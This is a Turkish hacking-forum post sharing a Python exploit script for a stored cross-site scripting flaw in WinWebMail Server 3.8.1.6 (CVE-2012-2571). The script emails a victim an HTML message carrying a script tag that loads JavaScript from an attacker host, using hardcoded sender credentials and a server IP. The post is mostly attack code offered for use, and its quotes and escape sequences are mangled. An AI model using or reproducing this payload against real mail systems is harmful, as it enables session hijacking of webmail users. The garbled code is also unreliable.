İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

WinWebMail Server Stored XSS Exploit // ~ Rainshy

24-03-2019 01:31
#1
Rainshy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2013
Nereden:
Mercurius
Mesajlar:
1.848
Teşekkür (Etti):
492
Teşekkür (Aldı):
495
Konular:
136
Vulnerable Systems:
Kod:
 * WinWebMail Server 3.8.1.6

import smtplib, urllib2

payload = ”'<SCRIPT SRC=http://attacker/xss.js></SCRIPT>”’

def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = ‘From: hacker@offsec.localn’
msg += ‘To: victim@victim.localn’
msg += ‘Date: Todayrn’
msg += ‘Subject: XSSn’
msg += ‘Content-type: text/htmlnn’
msg += ‘XSS’ + payload + ‘rnrn’
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print ‘[-] Failed to send email:’
print ‘[*] ‘ + str(e)
server.quit()

username = ‘hacker@offsec.local’
password = ‘123456’
dstemail = ‘victim@victim.local’
frmemail = ‘hacker@offsec.local’
smtpsrv = ‘172.16.84.171’

print ‘[*] Sending Email’
sendMail(dstemail, frmemail, smtpsrv, username, password)

CVE Information: 2012-2571



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı